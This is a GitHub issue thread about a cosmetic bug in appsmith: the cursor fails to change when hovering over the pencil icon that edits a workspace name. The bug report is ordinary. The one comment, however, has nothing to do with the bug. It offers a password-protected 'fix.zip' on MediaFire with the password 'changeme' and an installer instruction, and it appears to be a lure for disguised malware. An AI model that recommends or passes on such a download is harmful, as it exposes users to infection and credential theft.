### ISSUE TITLE
[Bug]: Appropriate cursor does not appear when hovering over pencil icon to change workspace name

### ISSUE THREAD

**Issue by shadabbuchh** [appsmithorg/appsmith#35878]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Description

When hovering over the pencil icon to edit a workspace name, the expected CTA cursor does not appear. This got introduced as part of this fix PR: https://github.com/appsmithorg/appsmith/pull/35855

### Steps To Reproduce

1. Try to change a workspace name

**Expected:** The appropriate CTA cursor should appear.

### Environment

Release

### Severity

Low (Cosmetic UI issues)

### Issue video log

https://jam.dev/c/164fd07c-4017-4f55-9a1d-fd577ddb0ec3

### Version

Cloud

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
